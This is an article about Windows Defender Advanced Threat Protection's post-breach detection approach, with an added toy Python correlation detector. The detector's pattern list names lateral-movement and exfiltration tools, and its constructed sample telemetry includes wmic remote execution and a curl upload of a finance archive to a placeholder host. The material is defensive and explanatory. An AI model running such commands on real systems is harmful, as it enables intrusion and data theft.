Resource: Using Windows Defender Advanced Threat Protection After a Breach

Windows Defender Advanced Threat Protection will provide Enterprise users with the tools to investigate and deal with attacks on their networks.

Richard Hay, Senior Content Producer

August 8, 2016


One of the new features we have told you about in the Windows 10 Anniversary Update, which was released earlier this month, is Windows Defender Advanced Threat Protection (ATP).

The idea behind ATP is that, with a constantly changing threat landscape, it may be impossible to protect company networks 100% despite our best efforts, so it is important to know when a network has been breached. That awareness can then be used to investigate the attack, identify its specific vector, and remediate the weak spot it came in through.

It also lets an organization know that a breach has occurred and find out what data, if any, has been compromised. Without that visibility, companies may have intruders in their networks for days, weeks, months and sometimes years before they learn it happened.

As mentioned above, these ATP features are new to the Anniversary Update for Windows 10, so it is likely that many organizations are not yet actively using ATP beyond small-scale testing of the OS update itself.

For those of you still considering your options for migrating to Windows 10 in the future, a new white paper from the Windows Security Center gives background on how this post-breach feature works.

"Unlike pre-breach, post-breach assumes a breach has already occurred – acting as a flight recorder and crime scene investigator (CSI). It monitors security events on the endpoint and leverages large scale correlation and anomaly detection algorithms to alert on evidence of an ongoing attack. Post-breach leverages the attacker's need to perform multiple actions after the initial breach, such as performing reconnaissance, hiding and moving across the network to locate high-value assets, and executing information extraction. Post-breach provides security teams the information and toolset needed to identify, investigate, and respond to attacks that otherwise will stay undetected and below the radar. Finally, post-breach closes the loop back to pre-breach antimalware and other prevention capabilities by feeding them with missed signals and samples. As such, it complements the pre-breach security solution stack."
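The key point in that excerpt is that no single post-breach action is conclusive on its own (an administrator runs whoami too), but an attacker has to chain several of them. The following is an added, deliberately simplified example of that correlation idea, written for this page; it is not Microsoft's code, and the stage keyword patterns, the two-hour window and the sample endpoint events are all constructed assumptions for illustration.

```python
"""Toy post-breach correlation over constructed endpoint events.

Illustrates the white paper's idea that a chain of reconnaissance, lateral
movement and collection/exfiltration on one host within a short window is far
stronger evidence than any single command. Added example, not Microsoft's
detection logic; patterns, window and sample data are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Hypothetical mapping of command-line patterns to attack stages. A real
# product uses far richer, telemetry-driven models; this is only illustrative.
STAGE_PATTERNS = {
    "reconnaissance": [
        r"\bwhoami\b", r"\bnltest\b", r"\bnet\s+(group|user)\b.*/domain",
        r"\bquser\b", r"\bnet\s+view\b",
    ],
    "lateral_movement": [
        r"\bpsexec", r"\bwmic\b.*/node:", r"\bnet\s+use\s+\\\\",
        r"\bEnter-PSSession\b", r"\bInvoke-Command\b.*-ComputerName",
    ],
    "collection_exfiltration": [
        r"\bCompress-Archive\b", r"\b7z(a|\.exe)?\b\s+a\b", r"\brclone\b",
        r"\bcurl\b.*(-T|--upload-file)", r"\bcertutil\b.*-encode",
    ],
}
STAGE_ORDER = list(STAGE_PATTERNS)
WINDOW = timedelta(hours=2)  # assumed correlation window


@dataclass(frozen=True)
class Event:
    host: str
    user: str
    time: datetime
    cmdline: str


def classify(cmdline: str) -> str | None:
    """Map one process command line to an attack stage, or None if benign-looking."""
    for stage, patterns in STAGE_PATTERNS.items():
        if any(re.search(p, cmdline, re.IGNORECASE) for p in patterns):
            return stage
    return None


def correlate(events, min_stages=2):
    """Return one alert per host whose tagged events, within WINDOW of some
    starting event, cover at least min_stages distinct attack stages.
    A lone reconnaissance command therefore does not alert; a chain does."""
    by_host: dict[str, list] = {}
    for ev in sorted(events, key=lambda e: e.time):
        stage = classify(ev.cmdline)
        if stage:
            by_host.setdefault(ev.host, []).append((ev.time, stage, ev))
    alerts = []
    for host, tagged in by_host.items():
        for i, (t0, _, _) in enumerate(tagged):
            window = [x for x in tagged[i:] if x[0] - t0 <= WINDOW]
            stages = {s for _, s, _ in window}
            if len(stages) >= min_stages:
                alerts.append({
                    "host": host,
                    "start": t0,
                    "stages": [s for s in STAGE_ORDER if s in stages],
                    "evidence": [e.cmdline for _, _, e in window],
                })
                break  # one alert per host is enough for triage
    return alerts


# Constructed sample telemetry (not real data): WS-042 shows a full chain,
# WS-017 shows an admin running a couple of harmless lookups.
SAMPLE_EVENTS = [
    Event("WS-042", "CORP\\jsmith", datetime(2016, 8, 8, 9, 2), "whoami /all"),
    Event("WS-042", "CORP\\jsmith", datetime(2016, 8, 8, 9, 3), 'net group "Domain Admins" /domain'),
    Event("WS-042", "CORP\\jsmith", datetime(2016, 8, 8, 9, 40),
          'wmic /node:FS-01 process call create "cmd.exe /c dir C:\\"'),
    Event("WS-042", "CORP\\jsmith", datetime(2016, 8, 8, 10, 15),
          "7z.exe a C:\\Users\\Public\\docs.7z \\\\FS-01\\finance"),
    Event("WS-042", "CORP\\jsmith", datetime(2016, 8, 8, 10, 20),
          "curl -T C:\\Users\\Public\\docs.7z https://example.invalid/up"),
    Event("WS-017", "CORP\\admin", datetime(2016, 8, 8, 11, 0), "whoami"),
    Event("WS-017", "CORP\\admin", datetime(2016, 8, 8, 11, 1), "ipconfig /all"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["host"], alert["start"], alert["stages"])
        for line in alert["evidence"]:
            print("   ", line)
```

Lowering `min_stages` to 1 turns the same data into a noisy per-command alert on both hosts, which is exactly the trade-off the excerpt is describing: correlation across the attacker's multiple actions is what separates a signal from an administrator's routine commands.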

The five-page PDF document breaks down into the following areas about ATP:

  • A new challenge emerges

  • The post-breach approach

  • The Windows post-breach solution

    • Advanced threat detection

    • Investigation and response

    • Threat intelligence

    • Integrated solution

  • Windows 10 defense stack

The document is well worth your time if you want to learn more about ATP and how Microsoft plans to change the approach to breaches with this new feature in the Anniversary Update.

But, wait...there's probably more so be sure to follow me on Twitter and Google+.


About the Author

Richard Hay

Senior Content Producer, IT Pro Today (Informa Tech)

I served for 29 plus years in the U.S. Navy and retired as a Master Chief Petty Officer in November 2011. My work background in the Navy was telecommunications related so my hobby of computers fit well with what I did for the Navy. I consider myself a tech geek and enjoy most things in that arena.

My first website – AnotherWin95.com – came online in 1995. Back then I used GeoCities Web Hosting for it and WindowsObserver.com is the result of the work I have done on that site since 1995.

In January 2010 my community contributions were recognized by Microsoft when I received my first Most Valuable Professional (MVP) Award for the Windows Operating System. Since then I have been renewed as a Microsoft MVP each subsequent year since that initial award. I am also a member of the inaugural group of Windows Insider MVPs which began in 2016.

I previously hosted the Observed Tech PODCAST for 10 years and 317 episodes and now host a new podcast called Faith, Tech, and Space. 

I began contributing to Penton Technology websites in January 2015 and in April 2017 I was hired as the Senior Content Producer for Penton Technology which is now Informa Tech. In that role, I contribute to ITPro Today and cover operating systems, enterprise technology, and productivity.

https://twitter.com/winobs
